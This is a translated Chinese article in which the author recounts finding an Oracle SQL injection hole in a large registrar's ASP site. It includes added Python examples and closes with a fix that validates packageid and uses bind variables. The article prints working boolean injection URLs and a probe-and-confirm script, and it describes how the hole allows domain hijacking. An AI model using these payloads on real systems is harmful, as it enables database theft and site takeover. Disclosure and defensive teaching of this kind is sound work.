Oracle also has injection vulnerabilities. Recently MSN, Jiangmin and other well-known websites have been threatened and attacked by hackers, and for a while the whole network was on edge. Our editorial department received a phone call from the author (Blazing Angel), who described in detail a vulnerability he had discovered in the website of the largest domestic domain-name provider (hereinafter "X Net"). The editorial department immediately contacted X Net's chief engineer, who confirmed that the flaw was genuine and promptly fixed it.
Discovery
On October 18, with my project finished, I was chatting with an online friend far away. Listening to him talk about launching his own website, I felt quite envious.
When would I have my own host and domain name... Thinking about applying for hosting and a domain name, I naturally thought of X Net (very famous in China ^_^). I casually opened its homepage and noticed the member login box in the upper right corner, which stirred my "thief's" heart again: if there were any holes to find, why not look, since I had nothing else to do anyway.
I took out a port scanner and swept X Net's server, but unexpectedly found no holes at all, which was really discouraging! On reflection, X Net has been around for more than ten years, and a large web server like this will not be short of security measures: port mapping, IDS and firewalls, every patch applied early, and maybe even a honeypot waiting for you!
After a while I suddenly noticed that X Net was written in ASP. Not long ago the ASP+MSSQL injection vulnerabilities made a lot of noise and many sites suffered. Could the same problem exist here? Whatever the case, try it first. I found a page for purchasing a virtual host: http://www???.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341. First I tried the classic test, and the page returned a type mismatch error: 'CDbl'. So what database does X Net use? I appended a single quote to the parameter and submitted the request, and the page returned an error message.
It was an Oracle error. When an Oracle database returns an error like this there may be a vulnerability. This resembles the MSSQL unclosed-quotation error, but where the MSSQL error lets us be almost certain of an injection hole, with Oracle we have to go a step further to decide.
Confirmation
The following steps are the basis of the intrusion and matter most. Enter the following in IE:
http://www???.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'%20and%200<>(Select%20count(*)%20from%20all_tables)%20and%20'1'='1
http://www???.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'%20and%200<>(Select%20count(*)%20from%20user_tables)%20and%20'1'='1
http://www???.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'%20and%200<>(Select%20count(*)%20from%20user_tab_columns)%20and%20'1'='1
These are the Oracle data-dictionary views I guessed at: all_tables, user_tables and user_tab_columns. If they were not there, it would be over.
Unexpectedly, all three pages returned normally, which shows not only that the system views I guessed exist, but also that the program processed the SQL statement I submitted.
At this point I had confirmed that X Net has an injection vulnerability.
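The probes above can be reproduced offline to see exactly what the server ends up executing. The following is an added example, not code from the article or from X Net: it builds the three confirmation URLs, reconstructs the SQL a string-concatenated ASP query would turn them into (the real query text is not on the page, so the `SELECT * FROM packages ...` shape is an assumption), classifies the first error a single quote triggers, and adds the check the article skipped: a control probe whose condition is false, so that a page which looks the same no matter what you send is not mistaken for a confirmed injection. The error strings and the `simulated_x_net` stand-in for the site are constructed to mimic the behaviour the article reports.

```python
from urllib.parse import quote, unquote

# The article's injection point; "www???.cn" is the article's own redaction, kept as-is.
BASE = "http://www???.cn/has_client/buy/vir_host/vir_host1_sb.asp"
PARAM = "packageid"
GOOD_ID = "10341"

# Oracle data-dictionary views probed in the article; any Oracle user can select from them.
ORACLE_DICT_VIEWS = ("all_tables", "user_tables", "user_tab_columns")


def probe_payload(view: str, truthy: bool = True) -> str:
    """The article's probe: close the literal, AND in a subquery, re-open the literal.
    truthy=False gives the control probe (0 = count(*)), false on any live schema."""
    op = "<>" if truthy else "="
    return f"{GOOD_ID}' and 0{op}(select count(*) from {view}) and '1'='1"


def probe_url(view: str, truthy: bool = True) -> str:
    # Encode only spaces, exactly like the URLs in the article (quotes, parens, <, > left bare).
    return f"{BASE}?{PARAM}=" + quote(probe_payload(view, truthy), safe="'()*<>=")


def reconstruct_sql(url: str) -> str:
    """Hypothetical reconstruction of what an unescaped, string-built ASP query becomes
    once the parameter is spliced in (assumed table/column names, not from the page)."""
    raw = unquote(url.split(f"?{PARAM}=", 1)[1])
    return f"SELECT * FROM packages WHERE {PARAM} = '{raw}'"


def classify_error(body: str) -> str:
    """What the first error page tells you about the backend (strings are well-known error texts)."""
    if "Type mismatch: 'CDbl'" in body:
        return "vbscript-cdbl"   # value hit CDbl() before SQL; not a database error at all
    if "ORA-" in body:
        return "oracle"          # Oracle error text: needs a boolean test to confirm injectability
    if "Unclosed quotation mark" in body:
        return "mssql"           # MSSQL unclosed-quote error: near-certain injection
    return "unknown"


def confirm_boolean_injection(fetch, baseline: str) -> bool:
    """fetch(url) -> page body. Confirmed only if every true probe reproduces the normal
    page AND the false control probe does not (the article ran only the true probes)."""
    for view in ORACLE_DICT_VIEWS:
        if fetch(probe_url(view, True)) != baseline:
            return False
    return fetch(probe_url("all_tables", False)) != baseline


def simulated_x_net(url: str) -> str:
    """Constructed stand-in for the vulnerable page, mimicking the behaviour the article reports."""
    sql = reconstruct_sql(url)
    if sql.count("'") % 2:                 # unbalanced quote: Oracle error page (constructed text)
        return "ORA-01756: quoted string not properly terminated"
    if " and 0=(select" in sql:            # control probe: the WHERE clause is false, no row
        return "No such package"
    return "Virtual host package 10341 ..."   # normal page


if __name__ == "__main__":
    for view in ORACLE_DICT_VIEWS:
        print(probe_url(view))
        print("  ->", reconstruct_sql(probe_url(view)))
    normal = simulated_x_net(f"{BASE}?{PARAM}={GOOD_ID}")
    print("injection confirmed:", confirm_boolean_injection(simulated_x_net, normal))
```

Run against a real target, `fetch` would be a function that performs the HTTP GET and returns the body; the control probe is what separates "the page ignores the parameter" from "the database evaluated my subquery".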
Exploitation
The database is arguably the most important part of a site. Through the vulnerability I found, we can fully read and modify all the data in the database: not just user accounts, but everything stored there.
If execute permission on UTL_FILE has been granted to PUBLIC, a UNION query can even be used to read files on the server, similar to LOAD_FILE() in PHP+MySQL injection, and of course UPDATE can be executed. In Oracle injection research I am still a rookie, though, and did not manage to insert data or carry out more advanced injection attacks. Throughout the test, the NBSI scanning function and WPE improved efficiency greatly.
Now I can obtain the information of all X Net users, and once logged in I can easily change where their domain names point. If I were a malicious attacker, I would only need to point a commercial site's domain name at a fake site I had built, and the account information users enter when logging in to that business site would have no security to speak of. In fact this vulnerability is somewhat like domain hijacking: as long as you are an X Net user, I can take down your site. For X Net itself, all of its business could be affected, and the data can be tampered with at will.
The other hazards are obvious and need no further explanation.
Fix
Preventing this kind of injection vulnerability is actually simple: strictly filter the parameters submitted in the URL, removing characters such as single quotes and SQL keywords. In practice: have the program check the string after the question mark in the submitted URL, and as soon as it finds a single quote, semicolon, SQL keyword or other special character, jump straight to a custom error page. Character filtering alone is fragile, though; the robust fix is to validate that packageid is purely numeric before using it, and to pass parameters to the database as bind variables instead of concatenating them into the SQL text.
For X Net's administrators, solving this problem takes less than five minutes. In addition, X Net should strengthen the security of the data in its database, at the very least by encrypting it!
Incidentally, many sites in this country have the same kind of injection vulnerability.
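To make the fix concrete, here is an added example that is not code from the article or from X Net. It puts the vulnerable pattern (the URL parameter concatenated into the SQL text, an assumed reconstruction since the real ASP source is not on the page) beside the article's blacklist filter and beside the two-part hardened version: an allowlist check that packageid is digits only, and a bind variable so the value can never become SQL syntax. sqlite3 stands in for Oracle so the example runs offline; the `packages` table and the `all_tables` table (a plain table mimicking Oracle's dictionary view) are constructed.

```python
import re
import sqlite3

# Constructed stand-in for the site's database (sqlite3 in place of Oracle).
def make_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE packages(packageid TEXT PRIMARY KEY, name TEXT);
        INSERT INTO packages VALUES ('10341', 'Virtual host package 1 (SB)');
        INSERT INTO packages VALUES ('10342', 'Virtual host package 2 (SB)');
        CREATE TABLE all_tables(table_name TEXT);   -- mimics Oracle's ALL_TABLES view
        INSERT INTO all_tables VALUES ('PACKAGES');
    """)
    return conn

# The probe the article used to confirm the hole, in decoded form.
PROBE = "10341' and 0<>(select count(*) from all_tables) and '1'='1"


def vulnerable_lookup(conn, packageid: str):
    """Hypothetical reconstruction of the original pattern: the parameter is spliced
    into the SQL text. Errors come back as text, like the error page the site showed."""
    sql = f"SELECT packageid, name FROM packages WHERE packageid = '{packageid}'"
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error as e:       # Oracle would answer ORA-01756 for the unbalanced quote
        return f"DB ERROR: {e}"


SQL_KEYWORDS = ("select", "union", "insert", "update", "delete", "drop", "and", "or")

def article_filter_rejects(raw: str) -> bool:
    """The article's fix: bounce the request on a quote, a semicolon or a SQL keyword."""
    if "'" in raw or ";" in raw:
        return True
    return any(re.search(rf"\b{kw}\b", raw, re.IGNORECASE) for kw in SQL_KEYWORDS)


def is_valid_packageid(raw: str) -> bool:
    """Allowlist: packageid is a number, so accept only digits (what the blacklist approximates)."""
    return re.fullmatch(r"[0-9]{1,10}", raw) is not None


def safe_lookup(conn, packageid: str):
    """Validate, then bind: with a placeholder the value is data, never SQL syntax.
    (sqlite3 uses '?'; Oracle drivers use a named bind such as ':pid', same principle.)"""
    if not is_valid_packageid(packageid):
        return None                  # where the ASP version would show its custom error page
    return conn.execute("SELECT packageid, name FROM packages WHERE packageid = ?",
                        (packageid,)).fetchone()


if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable, normal id :", vulnerable_lookup(db, "10341"))
    print("vulnerable, probe     :", vulnerable_lookup(db, PROBE))       # injected subquery ran
    print("vulnerable, lone quote:", vulnerable_lookup(db, "10341'"))    # error page leaks
    print("blacklist rejects probe:", article_filter_rejects(PROBE))
    print("safe, probe           :", safe_lookup(db, PROBE))             # rejected before SQL
    print("safe, normal id       :", safe_lookup(db, "10341"))
```

The probe still returns a row from `vulnerable_lookup` because the injected subquery is evaluated as part of the WHERE clause, while `safe_lookup` never lets it reach the database. The blacklist does stop this particular probe, but it is the allowlist and the bind variable that make the query correct regardless of what a future payload looks like.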
Postscript
Since so many worms and viruses have struck, we generally pay attention to server security, and some sites even open only port 80. Today the security of the code running on the server is especially important: a small oversight in the code can often bring the whole thing down.
Today it is a database injection hole; what will it be tomorrow?